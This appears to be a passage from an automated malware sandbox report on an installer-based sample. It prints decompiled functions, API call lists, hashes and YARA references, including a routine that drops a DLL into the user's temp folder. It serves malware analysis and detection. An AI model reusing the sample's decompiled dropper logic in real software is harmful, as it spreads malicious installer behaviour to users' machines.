				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                        0x00401f50
                                        0x00401f53
                                        0x00401f5b
                                        0x00401f60
                                        0x00401f65
                                        0x00401f69
                                        0x00401f6c
                                        0x00401f6e
                                        0x00401f75
                                        0x00401f7e
                                        0x00401f86
                                        0x00401f89
                                        0x00401f9e
                                        0x00401fa4
                                        0x00401fb7
                                        0x00401fc0
                                        0x00401fcc
                                        0x00401fd1
                                        0x00401fd1
                                        0x00401fb7
                                        0x00401fd4
                                        0x00401be1
                                        0x00401be1
                                        0x00401f89
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 1404258612-0
                                        • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                        • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                        • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                        • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                        0x004021fc
                                        0x00402200
                                        0x00402208
                                        0x0040220e
                                        0x00402211
                                        0x0040221e
                                        0x0040222f
                                        0x00402233
                                        0x0040223a
                                        0x00402243
                                        0x0040224b
                                        0x0040224e
                                        0x00402251
                                        0x00402255
                                        0x00402266
                                        0x0040226f
                                        0x004026da
                                        0x004026da
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • lstrlenA.KERNEL32 ref: 00402218
                                        • lstrlenA.KERNEL32(00000000), ref: 00402222
                                        • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                        • String ID:
                                        • API String ID: 3674637002-0
                                        • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                        • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                        • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                        • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                        0x00405568
                                        0x0040556f
                                        0x00405572
                                        0x00405577
                                        0x0040558a
                                        0x004055a4
                                        0x00000000
                                        0x004055a4
                                        0x0040558e
                                        0x0040558f
                                        0x00405592
                                        0x00405593
                                        0x0040559b
                                        0x00000000
                                        0x00000000
                                        0x0040559d
                                        0x004055a0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004055a0
                                        0x00000000
                                        0x00405580
                                        0x00000000
                                        0x00405581

                                        APIs
                                        • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040556D
                                        • CharNextA.USER32(00000000), ref: 00405572
                                        • CharNextA.USER32(00000000), ref: 00405581
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3213498283-3081826266
                                        • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                        • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                        • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                        • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                        0x00401d9c
                                        0x00401db5
                                        0x00401dbf
                                        0x00401dc4
                                        0x00401dcf
                                        0x00401dd6
                                        0x00401de8
                                        0x00401dee
                                        0x00401df3
                                        0x00401dfd
                                        0x00402536
                                        0x00401581
                                        0x004028d7
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • GetDC.USER32(?), ref: 00401D95
                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                        • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirect
                                        • String ID:
                                        • API String ID: 3272661963-0
                                        • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                        • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                        • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                        • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





                                        0x00404cad
                                        0x00404cca
                                        0x00404cce
                                        0x00404cd0
                                        0x00404cd0
                                        0x00404cd0
                                        0x00404cd7
                                        0x00404ce3
                                        0x00404d03
                                        0x00000000
                                        0x00404ce5
                                        0x00404ce8
                                        0x00404cee
                                        0x00404cf0
                                        0x00404d43
                                        0x00404d43
                                        0x00404d46
                                        0x00000000
                                        0x00404d56
                                        0x00404cfc
                                        0x00404cfe
                                        0x00404d06
                                        0x00404d06
                                        0x00404d09
                                        0x00404d0b
                                        0x00404d11
                                        0x00404d20
                                        0x00404d26
                                        0x00404d2d
                                        0x00404d34
                                        0x00404d3b
                                        0x00404d40
                                        0x00404d11
                                        0x00000000
                                        0x00404d09
                                        0x00404ce3
                                        0x00404cb3
                                        0x00404cbe
                                        0x00000000
                                        0x00404cc3
                                        0x00000000

                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404CE8
                                        • CallWindowProcA.USER32 ref: 00404D56
                                          • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                        • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                        • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                        • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                        0x0040253c
                                        0x0040253c
                                        0x0040253f
                                        0x0040255a
                                        0x00402541
                                        0x00402543
                                        0x00402548
                                        0x0040254f
                                        0x00402561
                                        0x004026da
                                        0x004026da
                                        0x00402567
                                        0x00402579
                                        0x004015c8
                                        0x004015ca
                                        0x00000000
                                        0x004015d0
                                        0x004015ca
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll, xrefs: 00402548, 0040256D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileWritelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 427699356-1768735994
                                        • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                        • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                        • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                        • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                        0x00405514
                                        0x0040551e
                                        0x00405520
                                        0x00405527
                                        0x0040552f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040552f
                                        0x00405531
                                        0x00405535

                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                        • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                        • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                        • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                        0x00405630
                                        0x00405632
                                        0x0040565a
                                        0x0040563f
                                        0x00405644
                                        0x0040564f
                                        0x00000000
                                        0x0040566c
                                        0x00405658
                                        0x00405658
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                        • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                        • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                        • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: Y4U48592345670954.exe PID: 7080 Parent PID: 7016 Y4U48592345670954.exeCOMMON

                                        Executed Functions

                                        Function 00419DB4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA$HA
                                        • API String ID: 2738559852-181183267
                                        • Opcode ID: 753c4999f6462e0e777ec3fe4d326bba6abdb323113bb9050810490bf84615d8
                                        • Instruction ID: 2fc6689533634def7b08fd75bee04c37c238bcda15983c85a777cccad901af33
                                        • Opcode Fuzzy Hash: 753c4999f6462e0e777ec3fe4d326bba6abdb323113bb9050810490bf84615d8
                                        • Instruction Fuzzy Hash: FC11F6B6200108AFCB18DF99DC81DEB77A9EF8C314F158649FA1CD7251C634EC518BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA
                                        • API String ID: 2738559852-2163208940
                                        • Opcode ID: 410ed903f88d5c5c52281dc4f4b6a55af454e8bbd433ea66d044455f4a9747de
                                        • Instruction ID: 65a429f643713c0dad0e0c48af134e2cc9fc42039adfe6599b7482ae9991c4bb
                                        • Opcode Fuzzy Hash: 410ed903f88d5c5c52281dc4f4b6a55af454e8bbd433ea66d044455f4a9747de
                                        • Instruction Fuzzy Hash: 5EF0E7B2200108AFCB14CF89CC84EEB77ADEF8C314F058259BA1D97241C630E851CBA4
